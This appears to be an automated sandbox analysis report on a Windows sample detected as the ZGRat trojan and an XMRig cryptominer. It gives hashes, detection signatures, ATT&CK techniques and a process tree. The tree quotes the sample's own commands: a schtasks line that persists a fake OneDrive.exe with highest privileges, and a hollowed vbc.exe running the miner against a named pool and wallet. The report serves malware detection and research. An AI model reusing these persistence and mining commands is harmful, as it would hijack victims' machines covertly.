xmrig | f9adadab14556ab5fbd0437eb0db594d16a088dd8650759254190be0be4fa90f

General

Target

f9adadab14556ab5fbd0437eb0db594d16a088dd8650759254190be0be4fa90f.exe
Size

5.2MB
MD5

a4810aa04ed8bb9570a8d851300ac0f9
SHA1

0c0ecb0e4396eba03e2d75f482209c656f83d64d
SHA256

f9adadab14556ab5fbd0437eb0db594d16a088dd8650759254190be0be4fa90f
SHA512

b9935f88c7771065e999d5e0212a2f394d90b78330c2f18c72c8baf8bdbadf8c1b9e8b9ae9289347cc9496917c25a7efa182c486c63fc8b65c32227903c8fdb4
SSDEEP

98304:gxiFxevUUdG/Mul2rq/aReDkizMeQUkfn:5/Mul2rVe4iwVUM

Score

10^/10

Malware Config

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral2/memory/3812-0-0x0000000000310000-0x0000000000842000-memory.dmp	family_zgrat_v1
behavioral2/files/0x0007000000023211-9.dat	family_zgrat_v1
behavioral2/files/0x0007000000023211-10.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/memory/4484-19-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-18-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-21-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-22-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-23-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-24-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-25-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-26-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-27-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-29-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-30-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-31-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-32-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/4484-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/3812-0-0x0000000000310000-0x0000000000842000-memory.dmp	net_reactor
behavioral2/files/0x0007000000023211-9.dat	net_reactor
behavioral2/files/0x0007000000023211-10.dat	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	OneDrive.exe

Executes dropped EXE 1 IoCs

pid	Process
3684	OneDrive.exe

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4484-13-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-15-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-16-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-19-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-18-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-21-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-22-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-23-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-24-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-25-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-26-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-32-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/4484-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3684 set thread context of 4484	3684	OneDrive.exe	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3068	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1984	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3684	OneDrive.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3812	f9adadab14556ab5fbd0437eb0db594d16a088dd8650759254190be0be4fa90f.exe
Token: SeDebugPrivilege	3684	OneDrive.exe
Token: SeLockMemoryPrivilege	4484	vbc.exe
Token: SeLockMemoryPrivilege	4484	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4484	vbc.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3812 wrote to memory of 3280	3812	f9adadab14556ab5fbd0437eb0db594d16a088dd8650759254190be0be4fa90f.exe	87
PID 3812 wrote to memory of 3280	3812	f9adadab14556ab5fbd0437eb0db594d16a088dd8650759254190be0be4fa90f.exe	87
PID 3280 wrote to memory of 1984	3280	cmd.exe	89
PID 3280 wrote to memory of 1984	3280	cmd.exe	89
PID 3280 wrote to memory of 3684	3280	cmd.exe	93
PID 3280 wrote to memory of 3684	3280	cmd.exe	93
PID 3684 wrote to memory of 3160	3684	OneDrive.exe	95
PID 3684 wrote to memory of 3160	3684	OneDrive.exe	95
PID 3160 wrote to memory of 3068	3160	cmd.exe	98
PID 3160 wrote to memory of 3068	3160	cmd.exe	98
PID 3684 wrote to memory of 4484	3684	OneDrive.exe	99
PID 3684 wrote to memory of 4484	3684	OneDrive.exe	99
PID 3684 wrote to memory of 4484	3684	OneDrive.exe	99
PID 3684 wrote to memory of 4484	3684	OneDrive.exe	99
PID 3684 wrote to memory of 4484	3684	OneDrive.exe	99
PID 3684 wrote to memory of 4484	3684	OneDrive.exe	99
PID 3684 wrote to memory of 4484	3684	OneDrive.exe	99

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f9adadab14556ab5fbd0437eb0db594d16a088dd8650759254190be0be4fa90f.exe
"C:\Users\Admin\AppData\Local\Temp\f9adadab14556ab5fbd0437eb0db594d16a088dd8650759254190be0be4fa90f.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6BCA.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3280
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1984
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3684
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3160
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:3068
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:4484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
573KB

MD5
23abd87f3746fecc7aac2ac1ee0af8c1

SHA1
9ff4420d386211230102b0b35120134df49f437f

SHA256
e260d00ebbb20d893a3093b593a6846da89e097781b62eb335108d9eac851dcc

SHA512
7bf0cd170b1edbbb04b7e0405afad2d7929cabe02710a74027e514a8444ffd7c461ba88ecaa3620361bf32a32fa5d3a831d679c417b87511532bf0f03b2ec0f4

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
729KB

MD5
599d02ff76c5a3ac33f3f9dda7d25740

SHA1
33b5774c41191545bdbb3041cfbd5f7d3f35790d

SHA256
b36d240b53013b837e2b0d37428927bc417c46e0bab354983e75c6677efc7d40

SHA512
4c386810e951fa0e8bff1dc65116efaf31afa7603621776dfa1464040909346dfe5fdcaa783862437a96dce3bc75ecf6cd3cce334cc535f8e68d56f80f819c4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6BCA.tmp.bat

Filesize
176B

MD5
3e2cb8be72f719381c4e6f7232a04b56

SHA1
90782dfa9daadc2a91eff3044ca69ce24ad8fa96

SHA256
5089dec5b2033dbef6a1b872718ae0fe5da1db02b30a75b1a97abd76acf63af0

SHA512
7d5fd590cb699d8bc8199bc647cb1c179d4cf78d54ce03456498372f1901cb9155479b43d6f923e96b869b64c013b0d1564c1ac5fdebc67402b123dda2a83c8c

Download Submit
memory/3684-17-0x00007FFCBD490000-0x00007FFCBDF51000-memory.dmp

Filesize
10.8MB

Download
memory/3684-11-0x00007FFCBD490000-0x00007FFCBDF51000-memory.dmp

Filesize
10.8MB

Download
memory/3684-12-0x000000001CA40000-0x000000001CA50000-memory.dmp

Filesize
64KB

Download
memory/3812-7-0x00007FFCBDC40000-0x00007FFCBE701000-memory.dmp

Filesize
10.8MB

Download
memory/3812-33-0x00007FFCBDC40000-0x00007FFCBE701000-memory.dmp

Filesize
10.8MB

Download
memory/3812-0-0x0000000000310000-0x0000000000842000-memory.dmp

Filesize
5.2MB

Download
memory/4484-23-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-27-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-19-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-18-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-20-0x0000014EBE830000-0x0000014EBE850000-memory.dmp

Filesize
128KB

Download
memory/4484-21-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-22-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-15-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-24-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-25-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-26-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-16-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-28-0x0000014EBE880000-0x0000014EBE8C0000-memory.dmp

Filesize
256KB

Download
memory/4484-29-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-30-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-32-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-13-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-35-0x0000014EC02D0000-0x0000014EC02F0000-memory.dmp

Filesize
128KB

Download
memory/4484-34-0x0000014EC02B0000-0x0000014EC02D0000-memory.dmp

Filesize
128KB

Download
memory/4484-36-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/4484-37-0x0000014EC02B0000-0x0000014EC02D0000-memory.dmp

Filesize
128KB

Download
memory/4484-38-0x0000014EC02D0000-0x0000014EC02F0000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads